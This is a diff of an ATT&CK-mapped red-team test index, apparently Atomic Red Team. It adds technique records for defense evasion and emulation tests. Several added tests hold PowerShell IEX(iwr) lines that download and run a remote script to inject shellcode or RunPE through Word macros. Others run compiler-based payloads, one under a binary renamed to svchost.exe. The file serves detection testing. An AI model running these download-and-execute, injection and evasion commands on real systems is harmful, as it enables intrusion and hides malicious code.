(such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line. For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. - name: Path Interception by PATH Environment Variable - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.007 - url: https://attack.mitre.org/techniques/T1574/007 - - external_id: CAPEC-capec - source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-06-20T22:02:40.983Z' - created: '2020-03-13T14:10:43.424Z' - x_mitre_platforms: - - Windows - x_mitre_contributors: - - Stefan Kanthak - x_mitre_data_sources: - - Process monitoring - - File monitoring + id: attack-pattern--0c2d00da-7742-49e7-9928-4514e5075d32 + x_mitre_defense_bypassed: + - Application control + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_detection: |- Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Application control + x_mitre_data_sources: + - Process monitoring + - File monitoring + x_mitre_contributors: + - Stefan Kanthak + x_mitre_platforms: + - Windows atomic_tests: [] T1574.008: technique: - created: '2020-03-13T17:48:58.999Z' - modified: '2020-03-26T20:03:27.496Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2 description: |- Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program. @@ -31480,9 +35662,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1574.008 url: https://attack.mitre.org/techniques/T1574/008 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-159 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/159.html - url: http://msdn.microsoft.com/en-us/library/ms682425 description: Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014. @@ -31498,6 +35680,16 @@ defense-evasion: url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN description: Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:03:35.217Z' + created: '2020-03-13T17:48:58.999Z' x_mitre_platforms: - Windows x_mitre_contributors: @@ -31522,23 +35714,13 @@ defense-evasion: atomic_tests: [] T1574.009: technique: - created: '2020-03-13T13:51:58.519Z' - modified: '2020-03-26T19:55:39.867Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - type: attack-pattern external_references: - source_name: mitre-attack external_id: T1574.009 url: https://attack.mitre.org/techniques/T1574/009 - - external_id: CAPEC-capec + - external_id: CAPEC-38 source_name: capec - url: https://capec.mitre.org/data/definitions/capec.html + url: https://capec.mitre.org/data/definitions/38.html - source_name: Microsoft CurrentControlSet Services url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree description: Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services @@ -31566,7 +35748,17 @@ defense-evasion: This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. id: attack-pattern--bf96a5a3-3bce-43b7-8597-88545984c07b - x_mitre_version: '1.0' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-09-17T19:05:23.755Z' + created: '2020-03-13T13:51:58.519Z' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_detection: |- Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious. @@ -31701,9 +35893,9 @@ defense-evasion: phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-07-01T18:23:25.002Z' + modified: '2020-10-21T01:26:31.804Z' created: '2020-07-01T18:23:25.002Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_permissions_required: - User @@ -31716,6 +35908,7 @@ defense-evasion: - Linux - macOS - Windows + - Network atomic_tests: [] T1055.002: technique: @@ -31808,11 +36001,12 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: persistence - modified: '2020-05-19T21:22:38.174Z' + modified: '2020-10-22T16:35:54.740Z' created: '2019-11-13T14:44:49.439Z' x_mitre_platforms: - Linux - Windows + - Network x_mitre_data_sources: - VBR - MBR @@ -31829,7 +36023,7 @@ defense-evasion: - Anti-virus - Host intrusion prevention systems - File monitoring - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_detection: |- Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes. Take snapshots of boot records and firmware and compare against known good images. Log changes to boot records, BIOS, and EFI, which can be performed by API calls, and compare against known good behavior and patching. @@ -32112,6 +36306,39 @@ defense-evasion: ' name: powershell + - name: RunPE via VBA + auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b + description: 'This module executes calc.exe from within the WINWORD.EXE process + +' + supported_platforms: + - windows + input_arguments: + ms_product: + description: Maldoc application Word + type: String + default: Word + dependency_executor_name: powershell + dependencies: + - description: 'Microsoft #{ms_product} must be installed + +' + prereq_command: | + try { + New-Object -COMObject "#{ms_product}.Application" | Out-Null + $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} + Stop-Process -Name $process + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} + manually to meet this requirement" + +' + executor: + command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\") + \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" + -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" + name: powershell T1055: technique: id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d @@ -32249,6 +36476,37 @@ defense-evasion: mavinject $mypid /INJECTRUNNING #{dll_payload} name: powershell elevation_required: true + - name: Shellcode execution via VBA + auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 + description: | + This module injects shellcode into a newly created process and executes. By default the shellcode is created, + with Metasploit, for use on x86-64 Windows 10 machines. + + Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office + is required. + supported_platforms: + - windows + dependency_executor_name: powershell + dependencies: + - description: 'The 64-bit version of Microsoft Office must be installed + +' + prereq_command: | + try { + $wdApp = New-Object -COMObject "Word.Application" + $path = $wdApp.Path + Stop-Process -Name "winword" + if ($path.contains("(x86)")) { exit 1 } else { exit 0 } + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) + manually to meet this requirement" + +' + executor: + command: | + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1") + Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" + name: powershell T1055.008: technique: external_references: @@ -32394,6 +36652,98 @@ defense-evasion: ' name: command_prompt + T1542.004: + technique: + created: '2020-10-20T00:05:48.790Z' + modified: '2020-10-22T02:18:19.568Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + type: attack-pattern + id: attack-pattern--a6557c75-798f-42e4-be70-ab4502e0a3bc + description: |- + Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks) + + + ROMMON is a Cisco network device firmware that functions as a boot loader, boot image, or boot helper to initialize hardware and software when the platform is powered on or reset. Similar to [TFTP Boot](https://attack.mitre.org/techniques/T1542/005), an adversary may upgrade the ROMMON image locally or remotely (for example, through TFTP) with adversary code and restart the device in order to overwrite the existing ROMMON image. This provides adversaries with the means to update the ROMMON to gain persistence on a system in a way that may be difficult to detect. + name: ROMMONkit + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1542.004 + url: https://attack.mitre.org/techniques/T1542/004 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + x_mitre_platforms: + - Network + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_detection: There are no documented means for defenders to validate the + operation of the ROMMON outside of vendor support. If a network device is + suspected of being compromised, contact the vendor to assist in further investigation. + x_mitre_permissions_required: + - Administrator + x_mitre_data_sources: + - File monitoring + - Netflow/Enclave netflow + - Network protocol analysis + - Packet capture + atomic_tests: [] + T1600.001: + technique: + id: attack-pattern--3a40f208-a9c1-4efa-a598-4003c3681fb8 + description: |- + Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution) + + Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key. + + Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) introduced to the system through [Modify System Image](https://attack.mitre.org/techniques/T1601) to change the configuration of the device. (Citation: Cisco Blog Legacy Device Attacks) + name: Reduce Key Space + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1600.001 + url: https://attack.mitre.org/techniques/T1600/001 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-10-21T22:36:22.369Z' + created: '2020-10-19T19:03:48.310Z' + x_mitre_data_sources: + - File monitoring + x_mitre_platforms: + - Network + x_mitre_detection: There is no documented method for defenders to directly identify + behaviors that reduce encryption key space. Detection efforts may be focused + on closely related adversary behaviors, such as [Modify System Image](https://attack.mitre.org/techniques/T1601) + and [Network Device CLI](https://attack.mitre.org/techniques/T1059/008). Some + detection methods require vendor support to aid in investigation. + x_mitre_permissions_required: + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + atomic_tests: [] T1108: technique: object_marking_refs: @@ -33983,9 +38333,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1574.010 url: https://attack.mitre.org/techniques/T1574/010 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-17 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/17.html object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 @@ -34003,7 +38353,7 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-03-26T19:37:28.912Z' + modified: '2020-09-16T19:10:04.262Z' created: '2020-03-12T20:43:53.998Z' x_mitre_contributors: - Travis Smith, Tripwire @@ -34038,9 +38388,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1574.011 url: https://attack.mitre.org/techniques/T1574/011 - - external_id: CAPEC-CAPEC + - external_id: CAPEC-478 source_name: capec - url: https://capec.mitre.org/data/definitions/CAPEC.html + url: https://capec.mitre.org/data/definitions/478.html - source_name: Registry Key Security url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN description: Microsoft. (2018, May 31). Registry Key Security and Access Rights. @@ -34091,7 +38441,7 @@ defense-evasion: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:01:09.906Z' + modified: '2020-09-16T19:07:48.590Z' created: '2020-03-13T11:42:14.444Z' x_mitre_defense_bypassed: - Application control @@ -34320,7 +38670,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:39:02.045Z' + modified: '2020-10-21T18:37:15.275Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -34501,6 +38851,69 @@ defense-evasion: command: '"#{microsoft_wordpath}\protocolhandler.exe" "ms-word:nft|u|#{remote_url}" ' + - name: Microsoft.Workflow.Compiler.exe Payload Execution + auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e + description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a + .Net assembly that launches calc.exe + +' + supported_platforms: + - windows + input_arguments: + xml_payload: + description: XML to execution + type: path + default: PathToAtomicsFolder\T1218\src\T1218.xml + dependency_executor_name: powershell + dependencies: + - description: ".Net must be installed for this test to work correctly.\n" + prereq_command: 'if (Test-Path C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe + ) {exit 0} else {exit 1} + +' + get_prereq_command: 'write-host ".Net must be installed for this test to work + correctly." + +' + executor: + command: | + Set-Location -path PathToAtomicsFolder\T1218\src ; + C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{xml_payload}" output.txt + name: powershell + elevation_required: false + - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions + auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911 + description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe + running a .Net assembly that launches calc.exe + +' + supported_platforms: + - windows + input_arguments: + xml_payload: + description: XML to execution + type: path + default: PathToAtomicsFolder\T1218\src\T1218.xml + renamed_binary: + description: renamed Microsoft.Workflow.Compiler + type: path + default: PathToAtomicsFolder\T1218\src\svchost.exe + dependency_executor_name: powershell + dependencies: + - description: ".Net must be installed for this test to work correctly.\n" + prereq_command: | + Copy-Item C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe "#{renamed_binary}" -Force + if (Test-Path "#{renamed_binary}") {exit 0} else {exit 1} + get_prereq_command: 'write-host "you need to rename workflow complier before + you run this test" + +' + executor: + command: | + Set-Location -path PathToAtomicsFolder\T1218\src ; + #{renamed_binary} #{xml_payload} output.txt + name: powershell + elevation_required: false T1216: technique: id: attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe @@ -34794,6 +39207,9 @@ defense-evasion: - source_name: mitre-attack external_id: T1027.003 url: https://attack.mitre.org/techniques/T1027/003 + - external_id: CAPEC-636 + source_name: capec + url: https://capec.mitre.org/data/definitions/636.html - url: https://en.wikipedia.org/wiki/Duqu description: Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018. source_name: Wikipedia Duqu @@ -34823,9 +39239,9 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-08T18:16:48.253Z' + modified: '2020-09-16T19:24:20.350Z' created: '2020-02-05T14:28:16.719Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_detection: Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known @@ -35250,6 +39666,70 @@ defense-evasion: - Anti-virus - File monitoring atomic_tests: [] + T1542.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1542.005 + url: https://attack.mitre.org/techniques/T1542/005 + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Secure Boot + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#35 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Secure + Boot. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Image File Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#7 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Image File Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco + IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Command History + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#23 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Command + History. Retrieved October 21, 2020. + - source_name: Cisco IOS Software Integrity Assurance - Boot Information + url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26 + description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot + Information. Retrieved October 21, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: TFTP Boot + description: |- + Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images. + + Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through use of a standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks) + id: attack-pattern--28abec6c-4443-4b03-8206-07f2e264a6b4 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-10-22T16:35:53.806Z' + created: '2020-10-20T00:06:56.180Z' + x_mitre_data_sources: + - Network device run-time memory + - Network device command history + - Network device configuration + - File monitoring + - Network device logs + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Consider comparing a copy of the network device configuration and system image against a known-good version to discover unauthorized changes to system boot, startup configuration, or the running OS. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot) (Citation: Cisco IOS Software Integrity Assurance - Image File Verification)The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor. (Citation: Cisco IOS Software Integrity Assurance - Run-Time Memory Verification) + + Review command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Check boot information including system uptime, image booted, and startup configuration to determine if results are consistent with expected behavior in the environment. (Citation: Cisco IOS Software Integrity Assurance - Boot Information) Monitor unusual connections or connection attempts to the device that may specifically target TFTP or other file-sharing protocols. + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_platforms: + - Network + atomic_tests: [] T1221: technique: id: attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534 @@ -35461,14 +39941,15 @@ defense-evasion: atomic_tests: [] T1497.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1497.003 - url: https://attack.mitre.org/techniques/T1497/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Time Based Evasion + created: '2020-03-06T21:11:11.225Z' + modified: '2020-07-01T16:32:02.532Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + type: attack-pattern + id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 description: "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically @@ -35479,22 +39960,23 @@ defense-evasion: Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. " - id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - modified: '2020-07-01T16:32:02.532Z' - created: '2020-03-06T21:11:11.225Z' - x_mitre_defense_bypassed: - - Host forensic analysis - - Signature-based detection - - Static File Analysis - - Anti-virus - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true + name: Time Based Evasion + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1497.003 + url: https://attack.mitre.org/techniques/T1497/003 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_contributors: + - Deloitte Threat Library Team + x_mitre_data_sources: + - Process monitoring + - Process command-line parameters x_mitre_detection: 'Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain @@ -35504,15 +39986,13 @@ defense-evasion: implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ' - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - x_mitre_contributors: - - Deloitte Threat Library Team - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Host forensic analysis + - Signature-based detection + - Static File Analysis + - Anti-virus atomic_tests: [] T1070.006: technique: @@ -35883,6 +40363,8 @@ defense-evasion: Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. external_references: - source_name: mitre-attack external_id: T1205 @@ -35891,6 +40373,18 @@ defense-evasion: description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.' source_name: Hartrell cd00r 2002 + - source_name: Cisco Synful Knock Evolution + url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices + description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco + IOS devices. Retrieved October 19, 2020. + - source_name: FireEye - Synful Knock + url: https://www.fireeye.com/blog/threat-research/2015/09/synful_knock_-_acis.html + description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful + Knock - A Cisco router implant - Part I. Retrieved October 19, 2020. + - source_name: Cisco Blog Legacy Device Attacks + url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 + description: Omar Santos. (2020, October 19). Attackers Continue to Target + Legacy Devices. Retrieved October 20, 2020. object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 type: attack-pattern @@ -35901,7 +40395,7 @@ defense-evasion: phase_name: persistence - kill_chain_name: mitre-attack phase_name: command-and-control - modified: '2020-07-01T18:27:41.755Z' + modified: '2020-10-21T15:30:44.964Z' created: '2018-04-18T17:59:24.739Z' x_mitre_contributors: - Josh Day, Gigamon @@ -35914,12 +40408,13 @@ defense-evasion: - Linux - macOS - Windows + - Network x_mitre_network_requirements: true x_mitre_detection: Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. x_mitre_defense_bypassed: - Defensive network service scanning - x_mitre_version: '2.0' + x_mitre_version: '2.1' x_mitre_is_subtechnique: false atomic_tests: [] T1127: @@ -36080,7 +40575,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-03-24T12:36:24.608Z' + modified: '2020-09-16T19:40:44.714Z' created: '2020-01-30T16:18:36.873Z' x_mitre_version: '1.0' x_mitre_is_subtechnique: false @@ -36181,6 +40676,75 @@ defense-evasion: - macOS - Windows atomic_tests: [] + T1564.007: + technique: + external_references: + - source_name: mitre-attack + external_id: T1564.007 + url: https://attack.mitre.org/techniques/T1564/007 + - source_name: FireEye VBA stomp Feb 2020 + url: https://www.fireeye.com/blog/threat-research/2020/01/stomp-2-dis-brilliance-in-the-visual-basics.html + description: 'Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February + 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September + 17, 2020.' + - source_name: Evil Clippy May 2019 + url: https://outflank.nl/blog/2019/05/05/evil-clippy-ms-office-maldoc-assistant/ + description: 'Hegt, S. (2019, May 5). Evil Clippy: MS Office maldoc assistant. + Retrieved September 17, 2020.' + - source_name: Microsoft _VBA_PROJECT Stream + url: https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-ovba/ef7087ac-3974-4452-aab2-7dba2214d239 + description: 'Microsoft. (2020, February 19). 2.3.4.1 _VBA_PROJECT Stream: + Version Dependent Project Information. Retrieved September 18, 2020.' + - source_name: Walmart Roberts Oct 2018 + url: https://medium.com/walmartglobaltech/vba-stomping-advanced-maldoc-techniques-612c484ab278 + description: Sayre, K., Ogden, H., Roberts, C. (2018, October 10). VBA Stomping + — Advanced Maldoc Techniques. Retrieved September 17, 2020. + - source_name: pcodedmp Bontchev + url: https://github.com/bontchev/pcodedmp + description: Bontchev, V. (2019, July 30). pcodedmp.py - A VBA p-code disassembler. + Retrieved September 17, 2020. + - source_name: oletools toolkit + url: https://github.com/decalage2/oletools + description: decalage2. (2019, December 3). python-oletools. Retrieved September + 18, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: VBA Stomping + description: |- + Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020) + + MS Office documents with embedded VBA content store source code inside of module streams. Each module stream has a PerformanceCache that stores a separate compiled version of the VBA source code known as p-code. The p-code is executed when the MS Office version specified in the _VBA_PROJECT stream (which contains the version-dependent description of the VBA project) matches the version of the host MS Office application.(Citation: Evil Clippy May 2019)(Citation: Microsoft _VBA_PROJECT Stream) + + An adversary may hide malicious VBA code by overwriting the VBA source code location with zero’s, benign code, or random bytes while leaving the previously compiled malicious p-code. Tools that scan for malicious VBA source code may be bypassed as the unwanted code is hidden in the compiled p-code. If the VBA source code is removed, some tools might even think that there are no macros present. If there is a version match between the 